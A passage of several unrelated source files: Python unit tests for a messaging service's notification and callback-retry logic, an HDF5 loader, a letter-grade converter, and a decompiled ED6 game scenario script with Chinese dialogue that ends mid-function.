        assert messages[0].id == self.message1.id
    def test_set_last_updated__should_set_timestamp_into_channel_repo(self):
        # The watermark is persisted as an ISO-8601 byte string.
        updated_at = datetime(2020, 6, 17, 11, 34, 56, 123456)
        self.use_case.set_last_updated_at(updated_at)
        assert self.use_case.get_last_updated_at() == updated_at
        assert self.channel_repo.get_object_content('updated_at') == b'2020-06-17T11:34:56.123456'
    def test_get_last_updated_at__when_not_available__should_return_none(self):
        assert self.use_case.get_last_updated_at() is None
    def test_execute__for_each_new_message__should_publish_notification(self):
        # With the watermark just past the first batch, only message1 is new.
        now = datetime(2020, 6, 17, 12, 4, 1, 222222)
        self.use_case.set_last_updated_at(now)
        self.use_case.execute()
        notification = self.notifications_repo.get_job()
        assert notification and notification[1] == {'content': {'id': self.message1.id}, 'topic': 'jurisdiction.AU'}
        assert not self.notifications_repo.get_job()
    def test_execute__when_no_last_updated_at__should_use_now(self):
        # Without a stored watermark the use case falls back to (mocked) utcnow.
        with mock.patch('api.use_cases.datetime') as mocked_datetime:
            mocked_datetime.utcnow.return_value = datetime(2020, 6, 17, 12, 1, 1, 222222)
            self.use_case.execute()
        notification = self.notifications_repo.get_job()
        notification2 = self.notifications_repo.get_job()
        assert notification and notification[1] == {'content': {'id': self.message2.id}, 'topic': 'jurisdiction.AU'}
        assert notification2 and notification2[1] == {'content': {'id': self.message1.id}, 'topic': 'jurisdiction.AU'}
        assert not self.notifications_repo.get_job()
class TestPublishStatusChangeUseCase:
    """Unit test for PublishStatusChangeUseCase."""
    def test_use_case__should_send_message_to_notification_queue(self):
        repo = mock.create_autospec(NotificationsRepo).return_value
        msg = Message(id=24, status=MessageStatus.CONFIRMED, payload={'sender': 'CN'})
        PublishStatusChangeUseCase(repo).publish(message=msg)
        expected_job = {
            'topic': '24',
            'content': {
                'id': 24
            }
        }
        repo.post_job.assert_called_once_with(expected_job)
class TestDispatchMessageToSubscribersUseCase(TestCase):
    """Tests for DispatchMessageToSubscribersUseCase.

    Fixes two always-passing assertions from the original: a mock assert
    method that was referenced but never invoked (a bound method is truthy),
    and ``.called`` checked on the repo mock itself instead of on its
    ``post_job`` method.
    """
    def setUp(self):
        self.notifications_repo = mock.create_autospec(NotificationsRepo).return_value
        self.notifications_repo.get_job.return_value = (
            'msg_id', {'topic': 'message.24.status', 'content': {'id': 24}}
        )
        self.subscriptions_repo = mock.create_autospec(SubscriptionsRepo).return_value
        self.subscription1 = mock.Mock(callback_url='http://callback.url/1')
        self.subscription2 = mock.Mock(callback_url='http://callback.url/2')
        self.subscriptions_repo.get_subscriptions_by_pattern.return_value = {
            self.subscription1,
            self.subscription2,
        }
        self.delivery_outbox_repo = mock.create_autospec(DeliveryOutboxRepo).return_value
        self.use_case = DispatchMessageToSubscribersUseCase(
            self.notifications_repo, self.delivery_outbox_repo, self.subscriptions_repo
        )
    def test_use_case__given_notification__should_post_job_to_outbox_for_each_related_subscribers(self):
        self.use_case.execute()
        calls = self.delivery_outbox_repo.mock_calls
        assert mock.call.post_job({'s': 'http://callback.url/1', 'payload': {'id': 24}}) in calls
        assert mock.call.post_job({'s': 'http://callback.url/2', 'payload': {'id': 24}}) in calls
        # Was `assert ...assert_called_once_with` without parentheses, which
        # asserted a truthy method object and could never fail.
        self.subscriptions_repo.get_subscriptions_by_pattern.assert_called_once()
    def test_use_case__when_no_subscribers_should_not_post(self):
        self.subscriptions_repo.get_subscriptions_by_pattern.return_value = set()
        self.use_case.execute()
        # Check the post_job method mock, not the repo mock itself.
        assert not self.delivery_outbox_repo.post_job.called
    def test_use_case__when_no_notifications__should_not_post(self):
        self.notifications_repo.get_job.return_value = False
        self.use_case.execute()
        assert not self.delivery_outbox_repo.post_job.called
    def test_use_case_when_subscription_not_valid__should_not_post_it(self):
        self.subscription1.is_valid = False
        self.use_case.execute()
        self.delivery_outbox_repo.post_job.assert_called_once_with({'s': 'http://callback.url/2', 'payload': {'id': 24}})
class TestDeliverCallbackUseCase(TestCase):
    """Tests for DeliverCallbackUseCase delivery/retry behaviour, with HTTP
    stubbed out by the `responses` library."""
    def setUp(self):
        self.job = {'s': 'http://callback.url/1', 'payload': {'id': 55}}
        self.delivery_outbox_repo = mock.create_autospec(DeliveryOutboxRepo).return_value
        self.delivery_outbox_repo.get_job.return_value = 'queue_id', self.job
        self.use_case = DeliverCallbackUseCase(self.delivery_outbox_repo, 'https://channel.url/hub')
        # Retry delays are presumably randomized; the fixed seed makes the
        # delay_seconds=12 expectation below deterministic - TODO confirm
        # against DeliverCallbackUseCase.
        random.seed(300)
    @responses.activate
    def test_use_case__given_deliverable__should_send_request(self):
        # 202 -> delivered: job deleted, nothing re-queued.
        responses.add(responses.POST, 'http://callback.url/1', status=202)
        self.use_case.execute()
        assert len(responses.calls) == 1
        request = responses.calls[0].request
        assert request.url == 'http://callback.url/1'
        assert request.headers['Link'] == '<https://channel.url/hub>; rel="hub"'
        assert request.body == b'{"id": 55}'
        assert not self.delivery_outbox_repo.post_job.called
        self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
    @responses.activate
    def test_use_case__when_callback_not_valid__should_retry(self):
        # 400 -> the job is re-queued with an incremented retry counter.
        responses.add(responses.POST, 'http://callback.url/1', status=400)
        self.use_case.execute()
        new_job = {'payload': {'id': 55}, 's': 'http://callback.url/1', 'retry': 2}
        self.delivery_outbox_repo.post_job.assert_called_once_with(new_job, delay_seconds=12)
        self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
    @responses.activate
    def test_use_case__when_max_retry_attempts_reached__should_not_retry(self):
        # At the retry cap the job is dropped instead of re-queued.
        self.job['retry'] = 3
        responses.add(responses.POST, 'http://callback.url/1', status=400)
        self.use_case.execute()
        self.delivery_outbox_repo.delete.assert_called_once_with('queue_id')
        assert not self.delivery_outbox_repo.post_job.called
|
import os
import h5py
def loadh5(dump_file_full_name):
    """Open the HDF5 file at *dump_file_full_name* and return its entire
    contents as a (possibly nested) dictionary."""
    with h5py.File(dump_file_full_name, 'r') as h5file:
        return readh5(h5file)
def readh5(h5node):
    """Recursively convert an h5py node (file or group) into a dictionary.

    Groups become nested dictionaries; datasets are read fully into memory.
    """
    dict_from_file = {}
    for _key in h5node.keys():
        if isinstance(h5node[_key], h5py._hl.group.Group):
            dict_from_file[_key] = readh5(h5node[_key])
        else:
            # Dataset.value was deprecated and removed in h5py 3.x;
            # ds[()] is the supported way to read a whole dataset.
            dict_from_file[_key] = h5node[_key][()]
    return dict_from_file
|
import sys

def letter_grade(grade):
    """Map a numeric grade on the 0-5 scale to a letter-grade string.

    Out-of-range values yield a usage message instead of a letter. The
    original's duplicated "B" branch for grades in [4.2, 4.5) was corrected
    to "B+".
    """
    if grade < 0 or grade > 5:
        return "Program expects a number from 0-5."
    # Ordered (exclusive upper bound, letter) cutoffs; first match wins.
    cutoffs = [
        (1.0, "F"), (1.5, "D-"), (2.0, "D"), (2.5, "D+"),
        (2.85, "C-"), (3.2, "C"), (3.5, "C+"), (3.85, "B-"),
        (4.2, "B"), (4.5, "B+"), (4.7, "A-"), (4.85, "A"),
    ]
    for upper, letter in cutoffs:
        if grade < upper:
            return letter
    return "A+"

if __name__ == "__main__":
    # Guarded so importing this module no longer requires a CLI argument.
    print(letter_grade(float(sys.argv[1])))
|
from ED6ScenarioHelper import *
def main():
    """Auto-generated ED6 scenario header for map R3102.x ('Zeiss'):
    declares the scenario file metadata, the map entry point and the
    script-function jump table. Generated data - avoid hand edits."""
    # Zeiss
    CreateScenaFile(
        FileName = 'R3102_1 ._SN',
        MapName = 'Zeiss',
        Location = 'R3102.x',
        MapIndex = 1,
        MapDefaultBGM = "ed60010",
        Flags = 0,
        EntryFunctionIndex = 0xFFFF,
        Reserved = 0,
        IncludedScenario = [
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            ''
        ],
    )
    BuildStringList(
        '@FileName', # 8
    )
    DeclEntryPoint(
        Unknown_00 = 0,
        Unknown_04 = 0,
        Unknown_08 = 6000,
        Unknown_0C = 4,
        Unknown_0E = 0,
        Unknown_10 = 0,
        Unknown_14 = 9500,
        Unknown_18 = -10000,
        Unknown_1C = 0,
        Unknown_20 = 0,
        Unknown_24 = 0,
        Unknown_28 = 2800,
        Unknown_2C = 262,
        Unknown_30 = 45,
        Unknown_32 = 0,
        Unknown_34 = 360,
        Unknown_36 = 0,
        Unknown_38 = 0,
        Unknown_3A = 144,
        InitScenaIndex = 0,
        InitFunctionIndex = 0,
        EntryScenaIndex = 0,
        EntryFunctionIndex = 1,
    )
    # Jump table: function name -> (hex index, decimal index).
    ScpFunction(
        "Function_0_AA", # 00, 0
        "Function_1_AB", # 01, 1
        "Function_2_AC", # 02, 2
        "Function_3_1CD1", # 03, 3
        "Function_4_24EF", # 04, 4
        "Function_5_2504", # 05, 5
        "Function_6_2519", # 06, 6
        "Function_7_2561", # 07, 7
        "Function_8_2576", # 08, 8
        "Function_9_258B", # 09, 9
        "Function_10_25A0", # 0A, 10
        "Function_11_25E8", # 0B, 11
        "Function_12_2630", # 0C, 12
        "Function_13_2678", # 0D, 13
        "Function_14_26BC", # 0E, 14
        "Function_15_26FA", # 0F, 15
        "Function_16_273F", # 10, 16
        "Function_17_27CE", # 11, 17
        "Function_18_27EA", # 12, 18
        "Function_19_2810", # 13, 19
        "Function_20_2836", # 14, 20
        "Function_21_2852", # 15, 21
        "Function_22_288F", # 16, 22
    )
# Empty scenario functions: each is a no-op Python def followed by its
# bytecode label and an immediate Return (generated structure).
def Function_0_AA(): pass
label("Function_0_AA")
Return()
# Function_0_AA end
def Function_1_AB(): pass
label("Function_1_AB")
Return()
# Function_1_AB end
# Event: the party meets two NPCs (0x8, 0x9) beside a broken-down orbal
# truck; a monster ambush interrupts, a battle (id 0x3F6) is fought, and
# on victory the "find the truck" quest flags are updated.
# NOTE(review): the def below is a decompiler stub; the real body is the
# top-level statement run that follows the label() call.
def Function_2_AC(): pass
label("Function_2_AC")
EventBegin(0x0)
OP_44(0x9, 0xFF)
OP_44(0x8, 0xFF)
Fade(1000)
# Position camera and party members for the opening shot.
OP_6D(-19410, 40, -38900, 0)
SetChrPos(0x101, -18990, 50, -38440, 180)
SetChrPos(0x102, -20320, 20, -39060, 135)
SetChrPos(0x107, -19090, 50, -36910, 180)
OP_6C(300000, 0)
OP_6B(3000, 0)
OP_4A(0x8, 255)
OP_4A(0x9, 255)
OP_0D()
ChrTalk(
    0x8,
    (
        "呜~……\x01",
        "难道出故障了吗?\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "啊……\x01",
        "看来的确是啊。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "偏偏坏在平原正中间,\x01",
        "真是麻烦啊。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#501F请问这里是怎么了?\x02\x03",
        "你们是不是遇到什么麻烦了?\x02",
    )
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
OP_62(0x9, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
TurnDirection(0x8, 0x101, 400)
TurnDirection(0x9, 0x101, 400)
Sleep(400)
# Branch on scenario flag (0xAF, 4): already-acquainted greeting vs.
# first-meeting introductions.
Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0xAF, 4)), scpexpr(EXPR_END)), "loc_315")
ChrTalk(
    0x8,
    (
        "啊啊,我以为是谁呢……\x01",
        "原来是艾丝蒂尔和约修亚啊。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    "#000F您好。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#010F很久不见了。\x02",
)
CloseMessageWindow()
TurnDirection(0x9, 0x8, 400)
ChrTalk(
    0x9,
    "是认识的人吗?\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "嗯,\x01",
        "他们和我一样也是游击士。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#010F不过我们还只是准游击士。\x01",
        " \x02",
    )
)
CloseMessageWindow()
TurnDirection(0x9, 0x101, 400)
Jump("loc_499")
label("loc_315")
ChrTalk(
    0x9,
    (
        "怎么了?\x01",
        "你们几个……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "咦?那个徽章……\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "难道说你们是……\x02",
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#006F嗯,对啊,\x01",
        "我们是准游击士。\x02\x03",
        "我叫艾丝蒂尔,\x01",
        "旁边的那位是……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#010F我叫约修亚,请多指教。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "哟,\x01",
        "这么年轻就当上游击士了啊。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "对了,你们就是传说中的……\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "请多指教,我叫王,\x01",
        "是蔡斯支部所属的游击士。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "你们的事情,\x01",
        "我在雾香小姐那里听说过。\x02",
    )
)
CloseMessageWindow()
label("loc_499")
# Common path: explain the breakdown and the quest context.
ChrTalk(
    0x8,
    (
        "可是你们\x01",
        "为什么会到这里来呢?\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#000F啊,是这样的。\x01",
        "我们正在护送这个女孩。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    (
        "#060F啊,是的。\x01",
        "我要去一趟亚尔摩村……\x02\x03",
        "所以就让艾丝蒂尔姐姐她们送我过去。\x01",
        " \x02",
    )
)
CloseMessageWindow()
TurnDirection(0x9, 0x107, 400)
ChrTalk(
    0x9,
    (
        "哦,我就说在哪儿见过你,\x01",
        "你不是提妲小妹妹吗。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "又是博士叫你去的吧?\x01",
        "每次要你去做的事情都很辛苦呢。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    "#067F呵呵…………\x02",
)
CloseMessageWindow()
ChrTalk(
    0x101,
    (
        "#000F……王先生,\x01",
        "你们在这里做什么呢?\x02\x03",
        "刚才看你们的样子,\x01",
        "好像遇到了什么麻烦吧。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x9, 0x101, 400)
ChrTalk(
    0x8,
    "啊,是的。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "我们打算把运输车\x01",
        "护送到沃尔费堡垒去……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "刚走到这里\x01",
        "车子就突然出毛病了。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "我想应该是\x01",
        "导力引擎出了故障。\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x9,
    (
        "刚开始发出咔嗒咔嗒的声音时,\x01",
        "我还以为是路况不平引起的。\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x101, 0x9, 400)
ChrTalk(
    0x101,
    "#003F哎呀,这可就麻烦了。\x02",
)
CloseMessageWindow()
# Branch on quest state OP_29(0x28, ...): extra dialogue if the party has
# already seen the bulletin-board request for this truck.
Jc((scpexpr(EXPR_EXEC_OP, "OP_29(0x28, 0x0, 0x2)"), scpexpr(EXPR_END)), "loc_93A")
OP_62(0x101, 0x0, 2000, 0x26, 0x26, 0xFA, 0x1)
Sleep(400)
ChrTalk(
    0x101,
    (
        "#002F啊,说起来……\x02\x03",
        "公告板上有一个寻找运输车的委托。\x01",
        " \x02\x03",
        "难道说就是王先生你们这辆吗?\x01",
        " \x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#012F嗯,应该就是。\x02",
)
CloseMessageWindow()
ChrTalk(
    0x8,
    (
        "这样啊……\x01",
        "原来协会也开始找我们了……\x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x107,
    (
        "#063F唔~可是……\x01",
        "是导力引擎出了故障。\x02\x03",
        "如果是这个原因,\x01",
        "那么不把内部用的\x01",
        "驱动导力器全部更换掉是不行的。\x02",
    )
)
CloseMessageWindow()
Jump("loc_993")
label("loc_93A")
ChrTalk(
    0x107,
    (
        "#063F是导力引擎的故障吗?\x02\x03",
        "那么不把内部用的\x01",
        "驱动导力器全部更换掉是不行的。\x02",
    )
)
CloseMessageWindow()
label("loc_993")
# Nested defs named lambda_* are decompiled per-character work items; each
# is queued onto a character's worker thread via QueueWorkItem.
def lambda_999():
    TurnDirection(0x102, 0x107, 400)
    ExitThread()
QueueWorkItem(0x102, 1, lambda_999)
TurnDirection(0x101, 0x107, 400)
ChrTalk(
    0x101,
    (
        "#004F啊…………?\x01",
        "现在不能进行修理吗?\x02",
    )
)
CloseMessageWindow()
TurnDirection(0x107, 0x101, 400)
ChrTalk(
    0x107,
    (
        "#063F因为导力引擎的核心\x01",
        "是极为精密的机械……\x02\x03",
        "如果要拆开修理,\x01",
        "就必须有相应的设备。\x02\x03",
        "只用简单的工具是无从下手的。\x01",
        " \x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#013F原来如此。\x02\x03",
        "要在室外修理的确是比较困难。\x01",
        " \x02\x03",
        "#012F………………嗯!?\x02",
    )
)
CloseMessageWindow()
# Ambush sequence: stop BGM, spawn monsters (0xA-0xF, 0x11-0x14) and run
# their approach work items.
OP_20(0x5DC)
OP_62(0x102, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_8C(0x102, 215, 400)
Sleep(800)
OP_21()
OP_1D(0x56)
def lambda_B1D():
    TurnDirection(0x8, 0x102, 400)
    ExitThread()
QueueWorkItem(0x8, 1, lambda_B1D)
def lambda_B2B():
    TurnDirection(0x107, 0x102, 400)
    ExitThread()
QueueWorkItem(0x107, 1, lambda_B2B)
def lambda_B39():
    TurnDirection(0x9, 0x102, 400)
    ExitThread()
QueueWorkItem(0x9, 1, lambda_B39)
TurnDirection(0x101, 0x102, 400)
ChrTalk(
    0x101,
    "#002F怎、怎么了?\x02",
)
CloseMessageWindow()
ChrTalk(
    0x102,
    "#012F嗯,这个感觉是……\x02",
)
CloseMessageWindow()
def lambda_B8A():
    OP_6D(-27480, -30, -42850, 3000)
    ExitThread()
QueueWorkItem(0x11, 1, lambda_B8A)
def lambda_BA2():
    OP_6C(270000, 3000)
    ExitThread()
QueueWorkItem(0x11, 2, lambda_BA2)
Sleep(700)
ClearChrFlags(0xA, 0x80)
SetChrChipByIndex(0xA, 8)
SetChrPos(0xA, -26150, -50, -46240, 45)
ClearChrFlags(0xB, 0x80)
SetChrChipByIndex(0xB, 8)
SetChrPos(0xB, -27650, 30, -47100, 45)
ClearChrFlags(0xC, 0x80)
SetChrChipByIndex(0xC, 8)
SetChrPos(0xC, -28470, -90, -45180, 45)
ClearChrFlags(0xD, 0x80)
SetChrChipByIndex(0xD, 8)
SetChrPos(0xD, -30510, -30, -44920, 45)
ClearChrFlags(0xE, 0x80)
SetChrChipByIndex(0xE, 8)
SetChrPos(0xE, -29310, -90, -43270, 45)
ClearChrFlags(0xF, 0x80)
SetChrChipByIndex(0xF, 8)
SetChrPos(0xF, -30380, 0, -46760, 45)
OP_43(0xA, 0x1, 0x1, 0x4)
OP_43(0xC, 0x1, 0x1, 0x6)
OP_43(0xE, 0x1, 0x1, 0x8)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_C9C():
    OP_8C(0x8, 270, 400)
    ExitThread()
QueueWorkItem(0x8, 1, lambda_C9C)
def lambda_CAA():
    OP_8C(0x101, 215, 400)
    ExitThread()
QueueWorkItem(0x101, 1, lambda_CAA)
Sleep(150)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x107, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_CEB():
    OP_8C(0x9, 270, 400)
    ExitThread()
QueueWorkItem(0x9, 1, lambda_CEB)
def lambda_CF9():
    OP_8C(0x107, 215, 400)
    ExitThread()
QueueWorkItem(0x107, 1, lambda_CF9)
OP_43(0xB, 0x1, 0x1, 0x5)
OP_43(0xD, 0x1, 0x1, 0x7)
Sleep(100)
SetChrChipByIndex(0x101, 3)
SetChrChipByIndex(0x102, 9)
SetChrChipByIndex(0x8, 5)
SetChrChipByIndex(0x107, 13)
OP_43(0xF, 0x1, 0x1, 0x9)
WaitChrThread(0xF, 0x1)
def lambda_D3A():
    OP_6D(-21250, -20, -39110, 1500)
    ExitThread()
QueueWorkItem(0x11, 1, lambda_D3A)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
Sleep(120)
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
WaitChrThread(0x11, 0x1)
OP_94(0x1, 0x9, 0xB4, 0xC8, 0x3E8, 0x0)
ChrTalk(
    0x9,
    "魔、魔兽!?\x02",
)
CloseMessageWindow()
ClearChrFlags(0x14, 0x80)
SetChrChipByIndex(0x14, 8)
SetChrPos(0x14, -22130, -40, -48120, 26)
SetChrFlags(0x14, 0x4)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_4A(0x14, 0)
SetChrSubChip(0x14, 4)
OP_96(0x14, 0xFFFFAC90, 0x7D0, 0xFFFF4F2A, 0x898, 0x1388)
SetChrChipByIndex(0x14, 7)
OP_4B(0x14, 0)
def lambda_DF5():
    OP_6D(-19870, -30, -41930, 1000)
    ExitThread()
QueueWorkItem(0x11, 1, lambda_DF5)
def lambda_E0D():
    OP_6C(180000, 1500)
    ExitThread()
QueueWorkItem(0x11, 2, lambda_E0D)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x101, 0x14, 400)
WaitChrThread(0x11, 0x2)
ChrTalk(
    0x101,
    "#005F王先生!上面!\x02",
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x8, 0x14, 400)
SetChrChipByIndex(0x14, 8)
OP_8E(0x14, 0xFFFFB17C, 0x7D0, 0xFFFF572C, 0x1B58, 0x0)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_4A(0x14, 0)
SetChrSubChip(0x14, 4)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
# QueueWorkItem2 items loop forever (label/Jump) until the thread is
# cancelled with OP_44 elsewhere.
def lambda_EBB():
    label("loc_EBB")
    TurnDirection(0x9, 0x14, 400)
    OP_48()
    Jump("loc_EBB")
QueueWorkItem2(0x9, 1, lambda_EBB)
OP_22(0xA3, 0x0, 0x64)
def lambda_ED1():
    OP_96(0x14, 0xFFFFB302, 0xFFFFFFD8, 0xFFFF5E52, 0x64, 0x1388)
    ExitThread()
QueueWorkItem(0x14, 1, lambda_ED1)
OP_51(0x14, 0x28, (scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
Sleep(200)
OP_43(0x8, 0x1, 0x1, 0xD)
Sleep(120)
OP_44(0x14, 0xFF)
SetChrFlags(0x14, 0x20)
SetChrFlags(0x14, 0x4)
SetChrFlags(0x14, 0x40)
PlayEffect(0x8, 0xFF, 0x14, 0, 2000, 0, 0, 0, 0, 900, 900, 900, 0xFF, 0, 0, 0, 0)
SetChrChipByIndex(0x14, 2)
SetChrSubChip(0x14, 0)
OP_8F(0x14, 0xFFFFB0F0, 0x320, 0xFFFF5BDC, 0x1F40, 0x0)
PlayEffect(0x12, 0xFF, 0xFF, -20370, 800, -42730, 0, 0, 0, 2000, 2000, 2000, 0xFF, 0, 0, 0, 0)
SetChrPos(0x14, -20240, 1000, -42020, 0)
OP_51(0x14, 0x2A, (scpexpr(EXPR_PUSH_LONG, 0x7530), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2B, (scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2C, (scpexpr(EXPR_PUSH_LONG, 0xFFFF15A0), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2D, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2E, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_51(0x14, 0x2F, (scpexpr(EXPR_PUSH_LONG, 0x3E8), scpexpr(EXPR_STUB), scpexpr(EXPR_END)))
OP_43(0x14, 0x3, 0x1, 0xF)
OP_43(0x14, 0x2, 0x1, 0x10)
Sleep(400)
OP_96(0xB, 0xFFFF98FE, 0xFFFFFFBA, 0xFFFF50D8, 0x1F4, 0xBB8)
WaitChrThread(0x14, 0x2)
WaitChrThread(0x8, 0x1)
OP_44(0x9, 0x1)
OP_44(0x14, 0x3)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
ChrTalk(
    0x9,
    "#1P哇、哇哦!\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0xC, 400)
SetChrChipByIndex(0x8, 5)
TurnDirection(0x8, 0xB, 400)
OP_4B(0x8, 0)
ChrTalk(
    0x8,
    "#1P布鲁诺先生,请退后!\x02",
)
CloseMessageWindow()
ChrTalk(
    0x9,
    "#1P哦、哦!\x02",
)
CloseMessageWindow()
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
def lambda_10A9():
    OP_8E(0x9, 0xFFFFC09A, 0xFFFFFFE2, 0xFFFF6640, 0x7D0, 0x0)
    ExitThread()
QueueWorkItem(0x9, 1, lambda_10A9)
def lambda_10C4():
    OP_6D(-15540, -50, -40250, 2000)
    ExitThread()
QueueWorkItem(0x14, 1, lambda_10C4)
ClearChrFlags(0x11, 0x80)
SetChrChipByIndex(0x11, 8)
SetChrPos(0x11, -19100, -30, -50010, 43)
ClearChrFlags(0x12, 0x80)
SetChrChipByIndex(0x12, 8)
SetChrPos(0x12, -19100, -30, -50010, 43)
ClearChrFlags(0x13, 0x80)
SetChrChipByIndex(0x13, 8)
SetChrPos(0x13, -19100, -30, -50010, 43)
OP_43(0x11, 0x1, 0x1, 0xA)
Sleep(400)
OP_43(0x12, 0x1, 0x1, 0xB)
Sleep(400)
OP_43(0x13, 0x1, 0x1, 0xC)
OP_62(0x9, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
TurnDirection(0x9, 0x12, 400)
OP_95(0x9, 0x0, 0x0, 0x0, 0x320, 0x2EE0)
def lambda_1181():
    OP_6D(-19630, 60, -38120, 2000)
    ExitThread()
QueueWorkItem(0x14, 1, lambda_1181)
OP_62(0x9, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
OP_8E(0x9, 0xFFFFBBD6, 0x0, 0xFFFF6D66, 0xBB8, 0x0)
TurnDirection(0x9, 0x12, 400)
WaitChrThread(0x14, 0x1)
ChrTalk(
    0x9,
    (
        "哇、哇~!\x01",
        "后面也来了!\x02",
    )
)
CloseMessageWindow()
OP_62(0x8, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
OP_62(0x101, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
Sleep(120)
OP_62(0x107, 0x0, 2000, 0x2, 0x7, 0x50, 0x1)
OP_22(0x27, 0x0, 0x64)
def lambda_1235():
    TurnDirection(0xFE, 0x12, 400)
    ExitThread()
QueueWorkItem(0x101, 1, lambda_1235)
def lambda_1243():
    TurnDirection(0xFE, 0x12, 400)
    ExitThread()
QueueWorkItem(0x107, 1, lambda_1243)
TurnDirection(0x8, 0x12, 400)
ChrTalk(
    0x8,
    "………………嗯?!\x02",
)
CloseMessageWindow()
ChrTalk(
    0x102,
    (
        "#012F王先生,\x01",
        "后面的就拜托你了!\x02\x03",
        "这边的就由我们来对付。\x01",
        " \x02",
    )
)
CloseMessageWindow()
ChrTalk(
    0x8,
    "#1P好、好的……放心吧!\x02",
)
CloseMessageWindow()
def lambda_12C0():
    OP_8C(0xFE, 215, 400)
    ExitThread()
QueueWorkItem(0x101, 1, lambda_12C0)
OP_8C(0x107, 215, 400)
ChrTalk(
    0x101,
    (
        "#005F好!\x01",
        "交给我们吧!\x02",
    )
)
CloseMessageWindow()
OP_62(0x107, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
SetChrChipByIndex(0xA, 8)
SetChrChipByIndex(0xB, 8)
SetChrChipByIndex(0xC, 8)
SetChrChipByIndex(0xD, 8)
SetChrChipByIndex(0xE, 8)
SetChrChipByIndex(0xF, 8)
def lambda_133E():
    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xA, 1, lambda_133E)
def lambda_1354():
    OP_94(0x1, 0xFE, 0x0, 0xFA0, 0xBB8, 0x0)
    ExitThread()
QueueWorkItem(0xB, 1, lambda_1354)
def lambda_136A():
